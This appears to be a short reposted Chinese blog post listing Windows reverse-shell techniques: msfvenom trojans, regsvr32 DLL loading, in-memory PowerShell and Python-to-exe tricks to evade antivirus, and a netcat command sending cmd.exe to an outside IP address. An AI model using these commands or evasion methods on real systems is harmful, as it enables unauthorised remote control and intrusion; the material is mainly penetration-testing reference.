Windows反弹shell方法总结

Posted dgjnszf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Windows反弹shell方法总结相关的知识,希望对你有一定的参考价值。

一、运行exe程序反弹shell

需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。

二、加载dll文件反弹shell

需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。

三、PowerShell反弹shell

通过执行PowerShell代码反弹shell能有效绕过杀毒软件对拦截,因为通常将PowerShell代码直接加载到内存中,不会在磁盘上创建任何恶意文件,所以能绕过杀软的监控。可使用Cobalt Strike的Web脚本投递功能反弹shell。

四、脚本语言反弹shell

可通过运行php、Python、Shell等脚本语言程序反弹shell。可使用msfvenom生成各种语言的脚本程序。

五、Python脚本转换成exe反弹shell

将Python脚本转换成exe程序能有效绕过杀毒软件的检测实现免杀。

六、netcat反弹shell

在VPS上监听端口:netcat -l -p 443

在被控服务器上运行:netcat.exe -t -e cmd.exe 16.79.5.26 443

...

以上是关于Windows反弹shell方法总结的主要内容,如果未能解决你的问题,请参考以下文章

Linux下几种反弹Shell方法的总结---持续更新

渗透测试获取webshell方法总结

反弹shell学习总结

Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell

[Shell]Telnet反弹shell

Linux/Windows反弹shell